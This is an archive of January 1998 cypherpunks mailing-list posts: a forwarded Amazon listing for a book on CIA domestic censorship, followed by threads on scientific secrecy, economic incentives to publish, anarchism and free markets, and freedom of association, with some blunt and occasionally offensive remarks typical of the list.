> 	Sat, 10 Jan 1998 23:34:53 -0500 (EST)
> Received: from sirius.infonex.com (sirius.infonex.com [206.170.114.2])
> 	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id XAA11512
> 	for <cypherpunks@algebra.com>; Sat, 10 Jan 1998 23:34:49 -0500 (EST)
> Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id UAA07691; Sat, 10 Jan 1998 20:40:37 -0800 (PST)
> Received: from rigel.cyberpass.net (root@rigel.infonex.com [206.170.114.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id UAA07673 for <cpunks@sirius.infonex.com>; Sat, 10 Jan 1998 20:40:31 -0800 (PST)
> Received: from netcom13.netcom.com (vznuri@netcom13.netcom.com [192.100.81.125]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id UAA21838 for <cypherpunks@cyberpass.net>; Sat, 10 Jan 1998 20:35:54 -0800 (PST)
> Received: from localhost (vznuri@localhost)
> 	by netcom13.netcom.com (8.8.5-r-beta/8.8.5/(NETCOM v1.02)) with SMTP id UAA28539;
> 	Sat, 10 Jan 1998 20:40:26 -0800 (PST)
> Message-Id: <199801110440.UAA28539@netcom13.netcom.com>
> X-Authentication-Warning: netcom13.netcom.com: vznuri@localhost didn't use HELO protocol
> To: cypherpunks@cyberpass.net
> cc: vznuri@netcom13.netcom.com
> Subject: cia manipulation
> Date: Sat, 10 Jan 98 20:40:24 -0800
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>
> 
> there are different theories about why our government has gotten
> so bad, but I subscribe to the following:
> 
> 1. the public and media
> has not done its duty to keep our government in check. in addition
> to the 3 branches of govt as "checks and balances" built into our
> system, the public and media are the other two crucial ingredients.
> our forefathers didn't imagine either the public or media going bad,
> but that's what's happened imho.
> 
> 2. various special interests have hijacked the government. one of the
> biggest parasites is the "military industrial complex". 
> 
> the following book speaks to these points, and some here might be
> interested. I believe our government could be reformed if enough
> people cared, particularly those in the media and the public. a
> position I know will not be shared by any anarchists here.
> 
> 
> 
>                                                             Amazon.com Home
>                                                     Return to Graphics Mode
> 
>        Search / Browse Subjects / Bestsellers / Recommendation Center
>  Gift Center / Award Winning Books / Reviewed in the Media / Shopping Cart
> ---------------------------------------------------------------------------
> Secrets : The Cia's War at Home
> by Angus MacKenzie
> 
> List: $27.50
> Our Price: $19.25
> You Save: $8.25 (30%)
> 
> Availability: This title usually ships within 2-3 days.
> 
> Hardcover, 254 pages
> Published by Univ California Press
> Publication date: October 1, 1997
> Dimensions (in inches): 9.62 x 6.38 x 1
> ISBN: 0520200209
> 
> 
> (You can always remove it later...)
> 
> Learn more about
> 1-ClickSM ordering
> 
> Check out these titles! Readers who bought Secrets : The Cia's War at Home
> also bought:
> 
>    * The Cold War & the University : Toward an Intellectual History of the
>      Postwar Years; Noam Chomsky (Editor), et al
>    * Harvest of Rage : Why Oklahoma City Is Only the Beginning; Joel Dyer
>    * Firewall : The Iran-Contra Conspiracy and Cover-Up; Lawrence E. Walsh
> 
> Browse other Politics & Current Events titles.
> 
> ---------------------------------------------------------------------------
> Reviews and Commentary for Secrets : The Cia's War at Home
> 
> Have you read this book? Write an online review and share your thoughts
> with other readers.
> 
> The New York Times Book Review, Tim Weiner :
> Left in draft form at his death from brain cancer three years ago,
> completed by his friends and family, Secrets is Mackenzie's legacy: a book
> obsessed. Like the man, it is an unruly piece of work, but it grabs you by
> the lapels and holds on.
> 
> Synopsis:
> Drawing from government documents, scores of interviews, and numerous
> stories of CIA malfeasance, the late journalist Angus Mackenzie lays bare
> the behind-the-scenes evolution of a policy of suppression, repression,
> spying, and harassment beginning before the Johnson administration and
> continuing to the present. 11 illustrations.
> 
> Card catalog description
> This eye-opening expose, the result of fifteen years of investigative work,
> uncovers the CIA's systematic efforts over several decades to suppress and
> censor information. Angus Mackenzie, an award-winning yournalist, filed and
> won a lawsuit against the CIA under the Freedom of Information Act, and in
> the process became an expert on government censorship and domestic spying.
> Mackenzie lays bare a complex narrative of intrigue among federal agencies
> and their senior staff, including the Department of Defense, the executive
> branch, and the CIA. From cover-ups and secrecy oaths, to scandals over
> leaks and exposure, to the government's often insidious attempts to monitor
> and control public access to information, Mackenzie tracks the evolution of
> a policy of suppression, repression, spying, and harassment.
> 
> The publisher, University of California Press, www.ucpress.edu , 08/20/97:
> This Book is Now Available
> "If anything is more corrupting than power, it is power exercised in
> secret. Angus Mackenzie's magnificently researched, lucidly written study
> of the CIA's outrageous threats to freedom in America over the years is a
> summons to vigilance to protect our democratic institutions."
> --Daniel Schorr
> 
> "The late Angus Mackenzie has left an appropriate legacy in Secrets: The
> CIA's War at Home, a fitting capstone to his long career of exposing
> government secrecy and manipulation of public information. Secrets is a
> detailed, fascinating and chilling account of the agency's program of
> disinformation and concealment of public information against its own
> citizens."
> --Ben H. Bagdikian, author of THE MEDIA MONOPOLY
> 
> "Scrupulously reported, fleshed out with a fascinating cast of characters,
> skillfully illuminating a subject the news media seldom looked into and
> never got straight, Angus Mackenzie's last and best work richly deserves a
> posthumous Pulitzer -- for nonfiction, history, or both."
> --Jon Swan, former senior editor, Columbia Journalism Review
> 
> "This courageous, uncompromising book belongs on the bookshelf of every
> serious student of journalism and the First Amendment."
> --Tom Goldstein, Dean, Graduate School of Journalism, Columbia University
> 
> "Even in 1997, the exposures of courageous, enterprising journalists like
> Mackenzie are crucial for an open government."
> --Publishers Weekly
> 
> This eye-opening expose, the result of fifteen years of investigative work,
> uncovers the CIA's systematic efforts to suppress and censor information
> over several decades. An award-winning journalist, Angus Mackenzie waged
> and won a lawsuit against the CIA under the Freedom of Information Act and
> became a leading expert on questions government censorship and domestic
> spying. In Secrets, he reveals how federal agencies--including the
> Department of Defense, the executive branch, and the CIA--have monitored and
> controlled public access to information. Mackenzie lays bare the
> behind-the-scenes evolution of a policy of suppression, repression, spying,
> and harassment.
> 
> Secrecy operations originated during the Cold War as the CIA instituted
> programs of domestic surveillance and agent provocateur activities. As
> antiwar newspapers flourished, the CIA set up an "underground newspaper"
> desk devoted, as Mackenzie reports, to various counterintelligence
> activities--from infiltrating organizations to setting up CIA-front student
> groups. Mackenzie also tracks the policy of requiring secrecy contracts for
> all federal employees who have contact with sensitive information, insuring
> governmental review of all their writings after leaving government employ.
> 
> Drawing from government documents and scores of interviews, many of which
> required intense persistence and investigative guesswork to obtain, and
> amassing story after story of CIA malfeasance, Mackenzie gives us the best
> account we have of the government's present security apparatus. This is a
> must-read book for anyone interested in the inside secrets of government
> spying, censorship, and the abrogation of First Amendment rights.
> 
> FROM THE BOOK:
> "The major villains of the censorship story are a succession of
> policymakers from the Johnson administration through the Bush
> administration and on into the Clinton years, including several presidents
> themselves. In a sense, theirs is a spy story--not an action-packed one like
> in the movies but one about sleight-of-hand and subterfuge far truer to
> reality."
> 
> ANGUS MACKENZIE (1950-1994), an investigative reporter known for his
> persistence and independence, was one of the nation's foremost experts on
> freedom of information laws. Known for crusading journalism in defense of
> the First Amendment, his work appeared in publications ranging from
> alternative weeklies to the Washington Post and the Columbia Journalism
> Review. Mackenzie was affiliated with the Center for Investigative
> Reporting in San Francisco and taught at the School of Journalism at the
> University of California, Berkeley.
> 
> DAVID WEIR was a co-founder of the Center for Investigative Reporting,
> where he managed contracts with "60 Minutes," "20/20," CNN, CBS News, ABC
> News, and many other outlets. He served as editor and writer at a number of
> publications, including Rolling Stone, Mother Jones, and the San Francisco
> Examiner. He has won or shared over two dozen journalism awards, including
> the National Magazine Award.
> 
> The publisher, University of California Press, www.ucpress.edu , 08/20/97:
> "If anything is more corrupting than power, it is power exercised in
> secret. Angus Mackenzie's magnificently researched, lucidly written study
> of the CIA's outrageous threats to freedom in America over the years is a
> summons to vigilance to protect our democratic institutions."
> --Daniel Schorr
> 
> "The late Angus Mackenzie has left an appropriate legacy in Secrets: The
> CIA's War at Home, a fitting capstone to his long career of exposing
> government secrecy and manipulation of public information. Secrets is a
> detailed, fascinating and chilling account of the agency's program of
> disinformation and concealment of public information against its own
> citizens."
> --Ben H. Bagdikian, author of THE MEDIA MONOPOLY
> 
> "Scrupulously reported, fleshed out with a fascinating cast of characters,
> skillfully illuminating a subject the news media seldom looked into and
> never got straight, Angus Mackenzie's last and best work richly deserves a
> posthumous Pulitzer -- for nonfiction, history, or both."
> --Jon Swan, former senior editor, Columbia Journalism Review
> 
> "This courageous, uncompromising book belongs on the bookshelf of every
> serious student of journalism and the First Amendment."
> --Tom Goldstein, Dean, Graduate School of Journalism, Columbia University
> 
> "Even in 1997, the exposures of courageous, enterprising journalists like
> Mackenzie are crucial for an open government."
> --Publishers Weekly
> 
> This eye-opening expose, the result of fifteen years of investigative work,
> uncovers the CIA's systematic efforts to suppress and censor information
> over several decades. An award-winning journalist, Angus Mackenzie waged
> and won a lawsuit against the CIA under the Freedom of Information Act and
> became a leading expert on questions government censorship and domestic
> spying. In Secrets, he reveals how federal agencies--including the
> Department of Defense, the executive branch, and the CIA--have monitored and
> controlled public access to information. Mackenzie lays bare the
> behind-the-scenes evolution of a policy of suppression, repression, spying,
> and harassment.
> 
> Secrecy operations originated during the Cold War as the CIA instituted
> programs of domestic surveillance and agent provocateur activities. As
> antiwar newspapers flourished, the CIA set up an "underground newspaper"
> desk devoted, as Mackenzie reports, to various counterintelligence
> activities--from infiltrating organizations to setting up CIA-front student
> groups. Mackenzie also tracks the policy of requiring secrecy contracts for
> all federal employees who have contact with sensitive information, insuring
> governmental review of all their writings after leaving government employ.
> 
> Drawing from government documents and scores of interviews, many of which
> required intense persistence and investigative guesswork to obtain, and
> amassing story after story of CIA malfeasance, Mackenzie gives us the best
> account we have of the government's present security apparatus. This is a
> must-read book for anyone interested in the inside secrets of government
> spying, censorship, and the abrogation of First Amendment rights.
> 
> FROM THE BOOK:
> "The major villains of the censorship story are a succession of
> policymakers from the Johnson administration through the Bush
> administration and on into the Clinton years, including several presidents
> themselves. In a sense, theirs is a spy story--not an action-packed one like
> in the movies but one about sleight-of-hand and subterfuge far truer to
> reality."
> 
> ANGUS MACKENZIE (1950-1994), an investigative reporter known for his
> persistence and independence, was one of the nation's foremost experts on
> freedom of information laws. Known for crusading journalism in defense of
> the First Amendment, his work appeared in publications ranging from
> alternative weeklies to the Washington Post and the Columbia Journalism
> Review. Mackenzie was affiliated with the Center for Investigative
> Reporting in San Francisco and taught at the School of Journalism at the
> University of California, Berkeley.
> 
> DAVID WEIR was a co-founder of the Center for Investigative Reporting,
> where he managed contracts with "60 Minutes," "20/20," CNN, CBS News, ABC
> News, and many other outlets. He served as editor and writer at a number of
> publications, including Rolling Stone, Mother Jones, and the San Francisco
> Examiner. He has won or shared over two dozen journalism awards, including
> the National Magazine Award.
> 
> >From Kirkus Reviews , 07/01/97:
> A muckraking adventure in the violation of First Amendment rights. Although
> it probably won't come as a surprise to most readers that the federal
> government is capable of spying on its citizens, Mackenzie professes a
> certain bewilderment at the lengths to which the CIA went to suppress
> dissent in the days of Vietnam. The veteran left-wing journalist, who died
> of brain cancer in 1994, began his career as the publisher of an antiwar
> rag called the People's Dreadnaught; harassed by campus police, he was
> forced to suspend publication, although he later won $2,500 in a lawsuit
> against Beloit College over the matter. At a national level, he writes,
> similar suppression was the order of the day. Although the CIA is
> constrained by law from conducting investigations ``inside the continental
> limits of the United States and its possessions,'' in fact, Mackenzie
> charges, it concocted an elaborate counterintelligence program against
> various home-grown protest groups in the 1960s and early '70s, reasoning
> that it was taking antiterrorist measures and thus living up to the spirit,
> if not the letter, of its charter. Among the targets, Mackenzie writes, was
> Ramparts, a venerable leftist magazine that managed to earn the wrath of
> the Feds by reporting on that very internal spying. Other targets were the
> libertarian guru Karl Hess, renegade CIA whistleblowers Victor Marchetti
> and Philip Agee, and a host of lesser-known dissidents. The CIA emerges as
> the heavy, naturally, but the real villains in Mackenzie's account are
> various policymakers from the Johnson administration to the present.
> ``Incrementally over the years they expanded a policy of censorship to the
> point that today it pervades every agency and every department of the
> federal government,'' he writes. And, he continues, that change was so
> gradual that few guardians of the First Amendment noticed. Mackenzie is
> occasionally over the top, sometimes glib. But his charges ring true, and
> civil-liberties advocates will find much of interest in his pages. (11 b&w
> illustrations, not seen) -- Copyright (c)1997, Kirkus Associates, LP. All
> rights reserved.
> 
> Table of Contents
> Foreword
>      By David Weir
> Editors' Preface
> Acknowledgments
> Introduction
> Prologue: The CIA and the Origins of the Freedom of Information Act
> 1. Conservatives Worry and the Cover-Up Begins
> 2. You Expose Us, We Spy on You
> 3. The CIA tries to Censor Books
> 4. Bush Perfects the Cover-Up
> 5. Censor Others as You Would Have Them Censor You
> 6. Did Congress Outlaw This Book?
> 7. Trying to Hush the Fuss
> 8. Overcoming the Opposition
> 9. Censorship Confusion
> 10. The Pentagon Resists Censorship
> 11. Hiding Political Spying
> 12. One Man Says No
> 13. Control of Information
> 14. The CIA Openness Task Force
> Epilogue: The Cold War Ends and Secrecy Spreads
> App. Targets of Domestic Spying
> Notes
> Index
> 
> Look for similar books by subject:
> 
>  Government information
>  United States
>  Freedom of information
>  U.S. Government - Intelligence Agencies
>  POLITICS/CURRENT EVENTS
>  Civil Rights
> 
> i.e., each book must be in subject 1 AND subject 2 AND ...
> 
>    * I read this book, and I want to review it.
>    * I am the Author and I want to comment on my book.
>    * I am the Publisher and I want to comment on this book.
> 
> ---------------------------------------------------------------------------
> Search Our 2.5-Million-Title Catalog
> Enter Keywords:
> Other ways to search our catalog
> 
> or Browse by Subject
> 
> ---------------------------------------------------------------------------
>     Top of Page / Amazon.com Home / About Amazon.com / Need Help? / Your
>                                   Account
>                   Your 1-Click Settings / Shopping Basket
> 
>           Copyright and disclaimer (c) 1996-1998, Amazon.com, Inc.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 11 Jan 1998 13:00:33 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <199801102300.PAA06067@netcom7.netcom.com>
Message-ID: <D1k5ie52w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" <vznuri@netcom.com> writes:

> the mathematical establishment does not look with favor on Gauss'
> secrecy. the commentary is generally that it is a shame he was
> so secret and lost credit for his accomplishments. by the way,

My commentary is that if he had made an effort to disseminate even more of
his work during his lifetime, then they would have spawned more research
sooner, and he would have gotten feedback which would have refined his
ideas even further, and that would be good for the mathematics in general.

> I don't agree that publishing is merely about getting credit, although
> because humans are egotistical, that can be a powerful motivator.

Economic motivation is the best.  Right now a lot of good mathematical
research is kept proprietary because it has practical applications
(whether in cryptograpy or finance or some other industry). Publishing
in peer-reviewed jounrnals is a pain in the ass and the only people who
go through with it are colege professors seeking a tenure or a promotion.

The reason why patents were invented was to encourage inventors to
publish their inventions rather than keeping them a trade secret;
eventually the patent would expire and the new knowledge would
benefit everyone.

I wish I saw an economic incentive for folks working in the industry
(including the NSA et al), and the tenured professors to publish.

> you refer to science in a narrow sense of merely constructing things.
> this is not the sense of science that is of crucial importance to
> humanity as a whole. the atom bomb was in some ways a serious regression
> of the collective human condition.

Woulx you have liked it better if Truman gassed the japs?

> this is all so easy, refuting Timmy's feeble grasp of science, that
> I might soon quit. unless I get the sense (which I have a finely honed
> detector) that his veins are popping,
> in which case I'll post a few treatises on the subject.

Is that all that it takes?  Maybe I should post more often.

> >Have they begun torturing you with the snakes of Medusa yet?

Timmy sounds like Janos Bolyai, who claimed that Lobachevsky was not a
real person, but a tentacle of Gauss.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 13:11:37 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Freedom, Starvation, and Uncoerced Relationships (fwd)
Message-ID: <199801110535.XAA16273@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Freedom, Starvation, and Uncoerced Relationships
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Sat, 10 Jan 98 22:43:04 EST

> Evidently some folks on this list do feel that it's possible for the gubmint
> to curtail our liberties in some ways and not in others.  Phooey.

Exactly. And it is as it should be. Consider that speech is *not* equivalent
to action (eg. swinging a fist). Running an enterprise or engaging in some
activity *is* equivalent to the party swinging their fist. They have a
*right* to swing it so long as it *doesn't* interfere in others right to
swing their fist *and* the first parties swinging doesn't strike the second
party. In short, a party has the right to make as much money as they like,
however that right does not extend to the point of inhibiting others from
similar opportunities. A free market monopolizes, that monopolization
inhibits others from expressing their rights in the same manner that hitting
some person in the face inhibits their fist swinging because they are out
cold on the floor. As a consequence a free market is inherently inhibiting
on free expression - something any self-respecting anarchist won't put up
with. So we are left with the very simple conclusion that any anarchist
worth the title won't put up with a free market because it creates an
environment that creates a monarchy.

It is logicaly inconsistent, and philosophicaly nonsensical, to talk about
being an anarchist of any ilk *and* talking about supporting free markets.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 13:15:52 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: A further thought on free markets & anarchy...
Message-ID: <199801110542.XAA16327@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Given that anarchist don't support a 'head' in regards to human activities
*and* that a free market monopolizes thus creating a 'head' it is clear 
that if we apply the ideas of human society (ie political systems) to
economics we derive a fundamental conflict, that a anarchist in the economic
sphere is left with no choice but to agree that economic systems must be
managed and creates a 'head' either by plan or monopolistic fiat.

Therefore the original thesis that such political models are applicable to
economic ones is flawed. It simply is not possible for an economic system to
exhist without some sort of 'head' or guiding structure. This is
fundamentaly at odds with the definition and spirit of anarchy.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 11 Jan 1998 13:16:57 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.32.19980110200421.007049d8@cnw.com>
Message-ID: <VuL5ie55w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Blanc <blancw@cnw.com> writes:
> Initially your argument had to do with secrecy and the need for scientists
> to publish their work so that the scientific community may benefit from it.

Not just the scientific community... everyone. If an art critic declines
to publish something, its a loss probably only to his fellow art critics,
but if a mathematician or a biologist or a physicist doesn't publish, it's
a loss for more than just his colleagues.

>   I can't disagree that if a scientist is working for the public, that they
> should make their work publically available to them, since, after all, they
> are supposedly working for the public benefit.

I assume most of the research results from NIH or NIMH are publicly
available.  Unfortunatey, none of the stuff done at NSA gets published.
Of course NSA today is nothing like the NSA in the past. We're not
missing much by not seeing whatever inept drivel is produced by
Clinton's affirmativr action appointees.  Phooey.

> But you also said that "a key aspect of SCIENCE is publishing".    I was
> only pointing out that, in the context of those who are working for their
> own purposes and not under the employment of a government agency, some
> scientists are not overly concerned about contributing to this advancement,
> as can be observed by their reluctance to publish (even if they eventually
> do, "under the extreme pressure of friends", for instance).

Perhaps they would publish if there were an economic incentive to.

> I think you should distinguish between those scientistis who have joined
> some kind of "scientific community" and have established an obligation to
> share the results of their work with that group, and those scientists who
> are what they are, and do what they do, from motivations unrelated to such
> communities.

Instead of thinking in terms obligations, think of economic incentives.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 13:37:37 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801110603.AAA16499@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: rant on the morality of confidentiality 
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Sat, 10 Jan 98 23:48:06 EST

> Blanc <blancw@cnw.com> writes:
> > Initially your argument had to do with secrecy and the need for scientists
> > to publish their work so that the scientific community may benefit from it.
> 
> Not just the scientific community... everyone. If an art critic declines
> to publish something, its a loss probably only to his fellow art critics,
> but if a mathematician or a biologist or a physicist doesn't publish, it's
> a loss for more than just his colleagues.

I believe this view to be fundamentaly flawed. Consider that if a particular
scientist doesn't publish (ala Fermat) then this does not inherently
prohibit or inhibit others from deriving the result (lot's of examples so I
won't pick a single one). However, when an artist or other practitioner of
human expression fails to publish then an item of unique character is lost.
Had T.S. Elliot not written 'Old Possum's Book of Practical Cats' it is
*very* unlikely that *anyone* in the entire remaining history of the
universe would have written those charming poems and we would be deprived
among other things of knowing why a cat has three names. In addition, the
fact that a given individual finds no worth in why a cat has three names
does not change the worth of the insight provided by the author. So, while a
given art critics views may not mean much to you this does not justify in
any manner trivializing that worth for others. To do so would indicate a
personality of extreme hubris and potentialy a severe sociopathy. Expect
them to begin walking around with their hand in their vest at any moment.

The distinction is that human expression doesn't assume homogeneity nor
isotropy as science requires. Rather it assumes a priori that each activity
and it's result is unique in the history of the universe and fundamentaly an
expression of that *individual* view of experience. That is what art derives
it worth from while science derives its worth from the result being the same
irrespective of the practitioner.

And before somebody brings it up, while reality *is* observer dependant,
this is a recognition that the act of testing is fundamentaly a part of the
sytsem being tested. The statistical results *are* homogenious and
isotropic for observers - Fire in the Deep not withstanding.


            The end of our exploring will be to arrive at where we
            started, and to know the place for the first time.

                                                 T.S. Eliot




    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 11 Jan 1998 13:37:18 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <3.0.5.32.19980110202657.009336a0@popd.ix.netcom.com>
Message-ID: <Vom5ie57w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart <bill.stewart@pobox.com> writes:
>
> >>> Umm, no, freedom doesn't work like that.  If you open a *private*
> >>> establishment, you have the right, according to the constitution, to
> >>> deny *anyone* the right to enter or eat in your restraunt.
>
> I don't see freedom of association listed anywhere there;

Freedoms not explicitly enumerated there aren't protected? Come on.

> you might construe it as a "taking" or something, but it'd be a stretch.
> Also, there was a really appalling court case in the 1890s
> (Plessey vs. Ferguson), in which the Supremes ruled that states
> could require segregation with separate but equal accommodations;
> it was somewhat overturned by Brown vs. Board of Education in 1954,
> but the idea that the government can tell you how to run your business
> is long established (after all, we'd need much smaller governments
> if they couldn't be interfering in business.)

It was wrong for the gubmint (state) to require segregation just as it
is wrong for it to prohibit racial discrimination.

When martin luther king was boycotting buses et al, he had much support
from the private bus companies, who were required by the states to
segregate, but didn't want to.

"I have a dream.  I want my birthday to be a holiday." -MLK

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 11 Jan 1998 13:39:31 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801110521.XAA16005@einstein.ssz.com>
Message-ID: <42m5ie59w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

> > 1)  secrecy
>
> If you don't know something you either can't take advantage of it or else
> you have to rediscover it on your own. It is clear that if everyone had to
> re-invent the wheel at every step then not much would get done.

If you come up with a mathematical result that can be useful in finance,
you can sometimes make very substantial money either trading for yourself
or selling your result to others who trade. obviously if you publish it
in the open lierature, you can no longer do this.

Folks who work for the NSA and its foreign counterparts generally don't
publish anything, even stuff that would be totally useless to the enemies.

> > 2)  responsibility for publishing
>
> Nobody has a responsbility to publish. Science is a completely voluntary
> pursuit. I would contend personaly that if you don't publish you arent'
> doing science but rather mental masturbation (a rather selfish pursuit I
> suspect).

There have been scientists most of whose work was published after their deaths.
There probably have been scientists whose notes were lost after their deaths,
so we don't know who they were. There have been great writers most of whose
works were discovered and published after their deaths, and are still great
works of lierature.

Instead of talking about obligations or responsiiblities, try to come up
with an economic incentive to publish.  It works best.

> > 3)  working for the government at the expense of unwilling payors
>
> I don't think this is relevant to the issue at all.

Oh yes it is. I pay their salaries with my taxes, I want to see their results.
[snip]

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Sun, 11 Jan 1998 16:18:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
Message-ID: <3.0.32.19980111001654.007047c8@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr.Dimitri Vulis KOTM wrote:

>Not just the scientific community... everyone. If an art critic declines
>to publish something, its a loss probably only to his fellow art critics,
>but if a mathematician or a biologist or a physicist doesn't publish, it's
>a loss for more than just his colleagues.
.........................................................................

There is a sense of loss of valuable information, once you know that it
existed before you knew about it.   Of course, there are a million and one
things that we don't know today that we wish we knew, and which could help
everyone who has the need for that special knowledge.

1) But it is also true that the Truth (the facts of nature and principles
on what is possible - in mathematics, or any scientific pursuit) does not
"go away" simply because one person's discovery is not conveyed to
everyone.  It remains true and in existence, waiting for anyone else to do
the work of discovery, or for mankind itself to evolve into the kind of
creature whose mind can grasp the principles involved.   It is a loss not
to know the achievements of a great scientist's work, but the facts
themselves are not lost, they remain available for anyone who can think as
well, to find them.

2) Scientists and other very original, competent people like to think they
can do as well as any one else, and I imagine sometimes they consider
insulting the proposition that they must depend upon the work of another in
order to achieve understanding; that without it they would be unable to do
as well.  Isn't this one of the reasons for some of the conflicts between
scientists over originality, and the jealousy over recognition?

I went to an exhibit yesterday of Leonardo da Vinci, where I saw the 400
year old Codex Leicester.   He was "a keen observer" of Nature, and from
his detailed studies he learned much which provided his inventive mind with
much material for creative works.   The exhibit brings to mind not only his
work, but the methods of such a great mind in reaching those heights and
breadths.

So in relation to this debate on the morality of not sharing:  would it not
be as good a thing to look toward method - to value and promote the ability
to know how to think, how to observe properly, how to understand what is
before oneself - than merely to consider ourselves dependent upon the
_result_ of the work of certain others, bewailing their insensitivity when
they fail to share with us what they obtained for themselves?  Because this
does go in the direction of thinking in terms of "obligation", which is
rather unappreciative of their unique & separate identity.   
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sun, 11 Jan 1998 16:38:27 +0800
To: platypus@acmeonline.net
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <aBw1ie20w165w@bwalk.dm.com>
Message-ID: <3.0.5.32.19980111002305.007ca5f0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:28 AM 1/11/98 +1100, ? the Platypus {aka David Formosa} wrote:
> If you have a population of
>unchanging clones (your typical 'master race') you don't get any evoltion
>or improvement.
>

A population *must* undergo variation in its
heriditary units since 
1. there's always errors in copying the code
2. equivalently, you can't drive the error rate
of a channel down to 0, just arbitrarily close.

So your herd of clones will eventually acquire
some genetic diversity and selection necessarily
follows.

Geez are we off-subject.



David Honig 			honig@alum.mit.edu
---------------------------------------------------
If we can prevent the government from wasting the labours of the people
under the pretense of
 caring for them, they will be happy.  -TJ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sun, 11 Jan 1998 16:38:19 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <Pine.LNX.3.93.980111012555.141H-100000@shirley>
Message-ID: <3.0.5.32.19980111002729.007cc410@otc.net>
